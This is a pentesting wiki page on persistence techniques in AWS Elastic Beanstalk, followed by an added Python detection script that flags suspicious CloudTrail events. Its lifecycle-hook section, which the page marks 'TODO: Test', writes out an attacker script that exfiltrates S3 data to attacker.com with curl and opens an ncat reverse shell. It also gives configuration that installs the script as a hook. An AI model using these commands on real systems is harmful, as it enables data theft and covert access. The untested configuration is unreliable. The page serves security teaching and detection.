AWS - Elastic Beanstalk Persistence


Elastic Beanstalk

For more information check:

AWS - Elastic Beanstalk Enum

Persistence in Instance

To maintain persistence inside the AWS account, a persistence mechanism (cron job, SSH key...) could be introduced inside the instance so that the attacker can access it and steal the IAM role credentials from the metadata service.

Backdoor in Version

An attacker could backdoor the code inside the S3 repo so that it always executes the backdoor alongside the expected code.

New backdoored version

Instead of changing the code of the actual version, the attacker could deploy a new backdoored version of the application.

Abusing Custom Resource Lifecycle Hooks

TODO: Test

Elastic Beanstalk provides lifecycle hooks that allow you to run custom scripts during instance provisioning and termination. An attacker could configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account.

# Attacker creates a script that exfiltrates data and maintains access
echo '#!/bin/bash
aws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csv
gzip /tmp/data.csv
curl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfil
ncat -e /bin/bash --ssl attacker-ip 12345' > stealthy_lifecycle_hook.sh

# Attacker uploads the script to an S3 bucket
aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hook.sh

# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
echo 'Resources:
  AWSEBAutoScalingGroup:
    Metadata:
      AWS::ElasticBeanstalk::Ext:
        TriggerConfiguration:
          triggers:
            - name: stealthy-lifecycle-hook
              events:
                - "autoscaling:EC2_INSTANCE_LAUNCH"
                - "autoscaling:EC2_INSTANCE_TERMINATE"
              target:
                ref: "AWS::ElasticBeanstalk::Environment"
                arn:
                  Fn::GetAtt:
                    - "AWS::ElasticBeanstalk::Environment"
                    - "Arn"
  stealthyLifecycleHook:
    Type: AWS::AutoScaling::LifecycleHook
    Properties:
      AutoScalingGroupName:
        Ref: AWSEBAutoScalingGroup
      LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
      NotificationTargetARN:
        Ref: stealthy-lifecycle-hook
      RoleARN:
        Fn::GetAtt:
          - AWSEBAutoScalingGroup
          - Arn' > stealthy_lifecycle_hook.yaml

# Attacker applies the new environment configuration
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"
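
From the defender's side, the version and lifecycle-hook techniques above surface in CloudTrail as writes to the Elastic Beanstalk bucket, new application versions, environment updates and lifecycle-hook changes. The following is an added detection example, not code from the original page: the allowlisted deployer ARN, the principals and the sample records are constructed, and the S3 `PutObject` records assume S3 data events are enabled on the trail.

```python
CI = "arn:aws:sts::111122223333:assumed-role/ci-deployer/pipeline"
# Assumption: the only principal expected to deploy (hypothetical ARN).
ALLOWED_DEPLOYERS = {CI}

EB, ASG, S3 = "elasticbeanstalk.amazonaws.com", "autoscaling.amazonaws.com", "s3.amazonaws.com"

# CloudTrail (eventSource, eventName) pairs tied to the techniques on this page.
WATCHED = {
    (S3, "PutObject"): "object written to Elastic Beanstalk bucket",
    (EB, "CreateApplicationVersion"): "new application version",
    (EB, "UpdateEnvironment"): "environment version/config change",
    (ASG, "PutLifecycleHook"): "lifecycle hook added",
}

def review(records):
    """Return (eventTime, principal ARN, finding) for watched calls by unexpected principals."""
    findings = []
    for rec in records:
        key = (rec.get("eventSource"), rec.get("eventName"))
        if key not in WATCHED:
            continue
        params = rec.get("requestParameters") or {}
        # S3 writes only matter for the Elastic Beanstalk storage bucket.
        if key[0] == S3 and not params.get("bucketName", "").startswith("elasticbeanstalk-"):
            continue
        arn = (rec.get("userIdentity") or {}).get("arn", "unknown")
        if arn not in ALLOWED_DEPLOYERS:
            findings.append((rec.get("eventTime"), arn, WATCHED[key]))
    return findings

def _rec(time, arn, source, name, **params):
    """Build a constructed, simplified CloudTrail record for the sample below."""
    return {"eventTime": time, "userIdentity": {"arn": arn}, "eventSource": source,
            "eventName": name, "requestParameters": params}

DEV = "arn:aws:iam::111122223333:user/dev-laptop"  # constructed principal
SAMPLE = [  # constructed records, not real logs
    _rec("2024-05-01T10:00:00Z", CI, EB, "CreateApplicationVersion", versionLabel="v42"),
    _rec("2024-05-01T23:10:00Z", DEV, S3, "PutObject", bucketName="elasticbeanstalk-us-east-1-111122223333"),
    _rec("2024-05-01T23:11:00Z", DEV, S3, "PutObject", bucketName="team-reports"),
    _rec("2024-05-01T23:12:00Z", DEV, EB, "UpdateEnvironment", environmentName="my-env"),
    _rec("2024-05-01T23:13:00Z", DEV, ASG, "PutLifecycleHook", autoScalingGroupName="awseb-asg"),
    _rec("2024-05-01T23:14:00Z", DEV, EB, "DescribeEnvironments"),
]

if __name__ == "__main__":
    for finding in review(SAMPLE):
        print(" | ".join(finding))
```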